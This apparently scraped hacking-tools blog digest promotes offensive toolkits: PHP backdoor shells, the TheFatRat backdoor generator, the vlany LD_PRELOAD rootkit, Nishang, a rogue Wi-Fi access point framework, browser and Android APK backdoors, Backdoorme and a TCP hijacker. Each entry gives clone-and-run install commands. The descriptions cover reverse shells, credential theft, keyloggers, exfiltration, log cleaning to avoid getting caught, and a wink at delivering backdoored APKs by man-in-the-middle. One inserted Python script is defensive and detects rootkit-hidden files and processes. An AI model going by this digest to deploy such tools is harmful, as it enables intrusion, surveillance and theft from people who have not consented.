Just because our mothers raised us right, we always clean up after ourselves and pwnage is no exception. These logcleaners also help in not getting caught on that important engagement.
+ Misc :
This section includes miscellaneous files. Often, you will find non-security related stuff here.
+ Reversing :
Whether figuring out how that new piece of malware you just discovered works or hunting for the next 0day from $vendor, our reversing toolz will help you on your way.
+ Scanner
Can't find any useful hints on Shodan? Google dorks not dishing up the goods? Hell, get one of our scanners out and track down your targets in two shakes of a lol-cat's tail.
+ Shellcode
Just because our fuzzer worked or the PoC was fantastic doesn't mean that running calc is gonna put a smile on your face. If you got RCE, try our shellcodes to actually do something useful.
+ Wireless
Why wireless? It works and you don't have to wear your favorite nullsecurity hoody to hide your face from the camera in reception. Hack all the thingz!

Use and Download:

git clone https://github.com/nullsecuritynet/tools && cd tools
now you can run one by one tools inside the folder

Upgrade:
git pull origin master

Download : Master.zip | Clone URL
Source : http://nullsecurity.net/ | Our Post Before

Razboynik –разбойник : Reverse shell via file upload exploit.


Razboynik – разбойник – wants to be the best reverse shell based on a PHP backdoor.
Why Razboynik?
Where the FurezApi Framework and later FurezExploit (its C++ brother) were boring and long to set up and install, Razboynik learnt from those mistakes and fixes them. Razboynik gives you a better interface to handle the server (nothing better than a shell). Easier to install, faster to use, better to customize, and with hot new functionality:
+ Encoding of all requests (crypto on the way)
+ Infected requests by GET, POST, headers or cookies
+ Logs every result to a file
+ Better interface
+ Easy to plug in bundles and plugins thanks to modules
+ Proxied tunnel (on the way)


Binary
Binaries for different platforms (Linux, Windows and sooner or later Mac) will be available in the ./bin directory, so if you don't want to build the application yourself you can use them.
On Windows launch ./bin/razboynik.exe; on Linux (in your terminal, from the root directory): ./bin/razboynik

Usage:

git clone https://github.com/EatBytes/razboynik && cd razboynik
Be sure GOPATH is set on your system
go get github.com/eatbytes/razboynik/app
go build
./razboynik

Source: https://github.com/EatBytes

TheFatRat v1.7 codename keris – Backdoor Creator For Remote Access.


Changelog TheFatRat v1.7 ( 5/11/2016 ) Codename Keris:
* add backdoor ( rar files )
* Add backdoor ( doc not macro attack)
* Add new features in optional 1 ( create backdoor with msfvenom )
* Fix any bug


Download & Usage:

apt-get install mingw32 (install requirement)
git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
cd setup
bash setup.sh
chmod +x fatrat
./fatrat


Source: https://github.com/Screetsec | Our Post Before

vlany is a LD_PRELOAD rootkit for x86_64, i686 and ARM architectures.


NOTICE: THIS POST IS FOR EDUCATION & RESEARCH PURPOSES ONLY; it shows how a rootkit takes control of a system.
vlany is an LD_PRELOAD rootkit for x86_64, i686 and ARM architectures, complete with gid-based process hiding, xattr-based file hiding, network port hiding, anti-detection, anti-debug, persistent installation, execve commands, a PAM (ssh/sftp) backdoor, an accept() SSL/plaintext backdoor, an easy-to-use installation script and incredibly robust configuration.


Features:
* Process hiding
* User hiding
* Network hiding
* LXC container
* Anti-Debug
* Anti-Forensics
* Persistent (re)installation & Anti-Detection
* Dynamic linker modifications
* Backdoors
*** accept() backdoor (derived from Jynx2)
*** PAM backdoor
**** PAM auth logger
* vlany-exclusive commands
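Because the hiding is done by interposing libc functions such as readdir(), the listing you get depends on the path the request takes. The script below is an added example for this page, not part of vlany: it lists a directory once through os.listdir (libc readdir, which a preload can hook) and once by issuing getdents64 through libc's plain syscall() stub, then reports the difference. Run against /proc, that difference is the gid-hidden PIDs; against a data directory it is the xattr-hidden files. The dirent buffer used in the test is constructed; the syscall numbers are the x86_64 and aarch64 ones.

```python
from __future__ import annotations

import ctypes
import os
import platform
import struct
import sys

# __NR_getdents64 per architecture (arch/*/include/uapi/asm/unistd*.h).
GETDENTS64 = {"x86_64": 217, "aarch64": 61}
DIRENT_HDR = 19  # u64 d_ino + s64 d_off + u16 d_reclen + u8 d_type, then d_name[]


def raw_supported() -> bool:
    """True where raw_listdir() can issue the syscall itself."""
    return sys.platform == "linux" and platform.machine() in GETDENTS64


def make_dirent(name: str, ino: int = 1, d_type: int = 8, d_off: int = 0) -> bytes:
    """Build one struct linux_dirent64 record (constructed test data). The kernel pads
    records to 8 bytes; d_type 8 = DT_REG, 4 = DT_DIR."""
    raw = name.encode() + b"\0"
    reclen = (DIRENT_HDR + len(raw) + 7) & ~7
    return struct.pack("<QqHB", ino, d_off, reclen, d_type) + raw.ljust(reclen - DIRENT_HDR, b"\0")


def parse_dirents(buf: bytes) -> list[tuple[str, int]]:
    """Walk a getdents64 buffer and return (name, d_type) pairs."""
    out, off = [], 0
    while off + DIRENT_HDR <= len(buf):
        d_reclen, d_type = struct.unpack_from("<HB", buf, off + 16)
        if d_reclen < DIRENT_HDR or off + d_reclen > len(buf):
            raise ValueError(f"corrupt dirent at offset {off}")
        end = buf.index(b"\0", off + DIRENT_HDR)
        out.append((buf[off + DIRENT_HDR:end].decode(errors="surrogateescape"), d_type))
        off += d_reclen
    return out


def _libc() -> ctypes.CDLL:
    # libc's syscall(2) stub is a plain trampoline into the kernel; a preload that
    # hooks readdir() does not sit in its path unless it also wraps syscall().
    for name in ("libc.so.6", None):
        try:
            lib = ctypes.CDLL(name, use_errno=True)
            lib.syscall.restype = ctypes.c_long
            lib.syscall.argtypes = [ctypes.c_long, ctypes.c_int, ctypes.c_void_p, ctypes.c_size_t]
            return lib
        except (OSError, AttributeError):
            continue
    raise OSError("no usable syscall() stub found")


def raw_listdir(path: str) -> list[str]:
    """List a directory through getdents64 directly, bypassing readdir()."""
    if not raw_supported():
        raise OSError("raw listing implemented for x86_64/aarch64 Linux only")
    libc = _libc()
    buf = ctypes.create_string_buffer(64 * 1024)
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY)
    names: list[str] = []
    try:
        while True:
            n = libc.syscall(GETDENTS64[platform.machine()], fd, ctypes.addressof(buf), len(buf))
            if n < 0:
                err = ctypes.get_errno()
                raise OSError(err, os.strerror(err))
            if n == 0:
                break
            names += [name for name, _ in parse_dirents(buf.raw[:n]) if name not in (".", "..")]
    finally:
        os.close(fd)
    return names


def hidden_entries(path: str) -> set[str]:
    """Names the kernel returns for `path` that libc's readdir() (os.listdir) omits.
    On /proc the difference is the hidden PIDs; on a data directory, hidden files."""
    return set(raw_listdir(path)) - set(os.listdir(path))


if __name__ == "__main__":
    for target in sys.argv[1:] or ["/proc", "/etc", "/tmp"]:
        try:
            print(target, sorted(hidden_entries(target)) or "nothing hidden")
        except OSError as exc:
            print(target, "skipped:", exc)
```

Caveats: a preload can in principle wrap syscall() as well, and the dynamic linker modifications listed above let the library load without a visible /etc/ld.so.preload, so a statically linked checker, or booting from trusted media and inspecting the disk, is the stronger test. Do not inherit LD_PRELOAD from the shell you run this from, and expect short-lived processes to add noise on /proc, so compare a few times before calling a PID hidden.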


Latest Change 7/11/2016:
* Update patch_ld.py
* Update config.py

Use and download:

wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar -xf master.tar.gz
cd vlany-master && ./install.sh

Source: https://github.com/mempodippy

Nishang v0.7.0 – PowerShell for penetration testing and offensive security.


Changelog Nishang v0.7.0:
– Added Invoke-SSIDExfil to the Gather directory.
– Gupt-Backdoor can now receive commands from SSID names on targets having PowerShell v3 and above.
– Added ConvertTo-ROT13 to the Utility directory.


Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster, FireListener : A pair of scripts for egress testing.
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade : Dump user passwords in plain text on Windows 8.1 and Server 2012.
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– Create-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote : Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay : Create network relays between computers.

+ Prasadhak
– Prasadhak : Check hashes of running processes against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner.

+ Powerpreter
– Powerpreter : All the functionality of Nishang in a single script module.

+ Shells
– Invoke-PsGcat : Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent.
– Invoke-PsGcatAgent : Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp : An interactive PowerShell reverse connect or bind shell.
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence : Remove persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip | Our Post Before
Source : http://www.labofapenetrationtester.com/


WiFi-Pumpkin v0.8.3 – Framework for Rogue Wi-Fi Access Point Attack.


Changelog WiFi-Pumpkin v0.8.3:
* added new design main tool
* added new column VendorMac in man Table
* added set sorted in all Tablewidget
* added new plugins options and description
* added more options in statusbar main
* fixed allow traffic to/from wlan (iptables)
* added find file in directory cfg for check update
* changed the all directory structure characters to lowercase
* fixed No such file or directory [logs] #102
* fixed Error nmcli exceptions.OSError #104
* added error messages more explained
* added option to set Hostapd binary path (support hostapd-mana)
* fixed improvements in function get_interfaces #109
* added new plugin Responder (LLMNR, NBT-NS and MDNS poisoners)
* fixed Redirect traffic from all domains in dnsspoof module
* removed isc-dhcp-server (dhcpd) from dependencies (optional)
* added check if interface wireless support AP/Mode
* added python implements a DHCP Server by psychomario
* fixed installer:install mitmproxy in ubuntu
* added function: get possible errors from hostapd service
* fixed get_file_cfg_Update: get update from github
* fixed DNSServer: closes itself with this error #116

WiFi-Pumpkin v0.8.3

wifi-pumpkin v0.8.1

Wifi-Pumpkin Updater: click the Help menu, then Update

WiFi-Pumpkin is a security tool that provides a rogue access point for Man-In-The-Middle and other network attacks. It purports to provide wireless Internet service while snooping on the traffic, and can be used to capture the credentials of unsuspecting users, either by snooping on their communication or by phishing.
Features
+ Rogue Wi-Fi Access Point
+ Deauth Clients AP
+ Probe Request Monitor
+ DHCP Starvation Attack
+ Credentials Monitor
+ Windows Update Attack
+ Templates phishing
+ Partial bypass HSTS
+ Dump credentials phishing
+ Support airodump scan
+ Support mdk3 deauth
+ beef hook support
+ Report Logs html
+ Mac Changer
+ ARP Poison
+ DNS Spoof

Ubuntu/Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
chmod +x installer.sh
./installer.sh --install


Update
cd WiFi-Pumpkin
git pull origin master

then run
wifipumpkin (ubuntu)
wifi-pumpkin (kali 2.0)

Source : https://github.com/P0cL4bs | Download: 0.8.3.zip | 0.8.3.tar.gz | Our post before

ChromeBackdoor v3.0 – The Botnet Browser backdoor.


LEGAL DISCLAIMER:
The author does not hold any responsibility for the bad use of this script. Remember that attacking targets without prior consent is illegal and punishable by law; this script was built to show how resource files can automate tasks.

Changelog ChromeBackdoor v3.0:
+ chromebackdoor.py; Error bot – resolved.
+ SQL; SQL in root.

Chromebackdoor is a pentest tool that uses a MITB (man-in-the-browser) technique: it generates a Windows executable (".exe") which, once launched, runs a malicious extension or script in the most popular browsers and sends all DOM data to a command and control server.

ChromeBackdoor

Dependencies:
+ pip install crxmake
+ wine32

Usage and Install Dependencies:

pip install crxmake
git clone https://github.com/graniet/chromebackdoor && cd chromebackdoor
python chromebackdoor.py

Upgrade:
git pull

Source: https://github.com/graniet

backdoor-apk v0.1.7 is a shell script that simplifies the process of adding a backdoor to any Android APK file.


Changelog backdoor-apk v0.1.7 (2016-11-30):
* Improvements
++ Automatic generation of Metasploit resource script to handle selected payload (credit to John Troony for the suggestion)
* Bug Fixes
++ Fixed persistence hook breakage caused by upstream changes in Metasploit.

backdoor apk v0.1.7

Backdoor-Apk v0.1.4

Backdoor-apk-v0-1-2

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

backdoor apk v0.1.2

The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection at the specified IP and port.
Usage:

git clone https://github.com/dana-at-cp/backdoor-apk && cd backdoor-apk
./backdoor-apk.sh [your apk file]

Update:
git pull origin master

Now you can upload it using a MITM technique :-) (Just for education purposes, right? Yeah... let's rock)

Source: https://github.com/dana-at-cp | Our Post Before

Backdoorme – a powerful auto backdooring utilities.


LEGAL DISCLAIMER
The author does not hold any responsibility for the bad use of this script. Remember that attacking targets without prior consent is illegal and punishable by law; this script was built to show how resource files can automate tasks.

Changelog backdoorme 8/12/2016:
+ backdoors; python 3.5 for Travis, fixed mixed tabs/spaces.
+ target.py, requirements.txt, start.py, modules; python3 support, howto install using virtualenv.
+ compatible with python 2.7

Backdoorme is a powerful utility capable of backdooring Unix machines with a slew of backdoors. Backdoorme uses a familiar Metasploit-style interface with tremendous extensibility.
Backdoorme relies on having an existing SSH connection or credentials to the victim, through which it transfers and deploys any backdoors. In the future, this reliance will be removed as the tool is expanded.

backdoorme

Backdoors are organized by category:
+ Auxiliary
*** keylogger – Adds a keylogger to the system and gives the option to email results back to you.
*** simplehttp – installs python’s SimpleHTTP server on the client.
+ user – adds a new user to the target.
*** web – installs an Apache Server on the client.
+ Escalation
*** setuid – the SetUID backdoor works by setting the setuid bit on a binary while the user has root access, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root (‘nano /etc/shadow’). Note that root access is initially required to deploy this escalation backdoor.
*** shell – the shell backdoor is a privilege escalation backdoor, similar to (but more specific than) its SetUID escalation brother. It duplicates the bash shell to a hidden binary and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unprivileged user, simply run “.bash -p”, and you will have root access.
+ Shell
*** bash – uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.
*** bash2 – a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.
*** metasploit – employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.
*** netcat – uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.
*** netcat_traditional – utilizes netcat-traditional’s -e option to create a reverse shell.
*** perl – a script written in perl which redirects output to bash, and renames the process to look less conspicuous.
*** php – runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module.
*** pupy – uses n1nj4sec’s Pupy backdoor, found at https://github.com/n1nj4sec/pupy.
*** python – uses a short python script to perform commands and send output back to the user.
*** web – ships a web server to the target, then uploads msfvenom’s php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.
+ Access
*** remove_ssh – removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces.
*** ssh_key – creates RSA key and copies to target for a passwordless ssh connection.
*** ssh_port – Adds a new port for ssh.
+ Windows
*** windows – Uses msfvenom to create a windows backdoor.

Modules include:
* Poison
+-+ Performs bin poisoning on the target computer – it compiles an executable to call a system utility and an existing backdoor.
+-+ For example, if the bin poisoning module is triggered with “ls”, it would compile and move a binary called “ls” that would run both an existing backdoor and the original “ls”, thereby tricking a user into running an existing backdoor more frequently.
* Cron
+-+ Adds an existing backdoor to the root user’s crontab to run with a given frequency.
* Web
+-+ Sets up a web server and places a web page which triggers the backdoor.
+-+ Simply visit the site with your listener open and the backdoor will begin.
* User
+-+ Adds a new user to the target.
* Startup
+-+ Allows for backdoors to be spawned with the bashrc and init files.
* Whitelist
+-+ Whitelists an IP so that only that IP can connect to the backdoor.

Requirement:
+ All Linux Support
+ Metasploit Framework

Usage and Download from source:

howto install using virtualenv (clone first, then set up the environment inside the checkout):
git clone https://github.com/Kkevsterrr/backdoorme && cd backdoorme
sudo apt-get install python3 python3-pip python3-tk nmap
pip3 install virtualenv
virtualenv --python=python3.5 env
source env/bin/activate
(env) $ pip install -r requirements.txt
python master.py

Upgrade: git pull

Source: https://github.com/Kkevsterrr | Our Post Before

morpheus – automated TCP/UDP Hijacking tool.


LEGAL DISCLAIMER:
The author does not hold any responsibility for the bad use of this tool. Remember that attacking targets without prior consent is illegal and punished by law.

The morpheus framework automates tcp/udp packet manipulation tasks by using Ettercap filters to manipulate target requests/responses under MitM attacks, replacing the tcp/udp packet contents with our own contents before forwarding the packet back to the target host.

workflow:
1º – attacker -> arp poison local lan (mitm)
2º – target -> requests webpage from network (wan)
3º – attacker -> modifies webpage response (contents)
4º – attacker -> the modified packet is forwarded back to the target host

morpheus ships with some pre-configured filters but allows users to improve them when launching the attack (morpheus scripting console). At the end of the attack morpheus reverts the filter back to its default state, which lets users improve filters at run time without fear of messing up the filter command syntax and spoiling the filter.

morpheus

Framework limitations:
1º – morpheus will fail if the target system is protected against arp poisoning attacks
2º – downgrade attacks will fail if the target browser has an https-only add-on installed
3º – the target system sometimes needs to clear its net cache for arp poisoning to be effective
4º – many attacks described in morpheus may be dropped by the target's HSTS detection system

Dependencies:
+ Nmap
+ Zenity
+ Ettercap
+ Apache2

Use and Download:

git clone https://github.com/r00t-3xp10it/morpheus && cd morpheus
./morpheus.sh

Source: https://github.com/r00t-3xp10it/morpheus
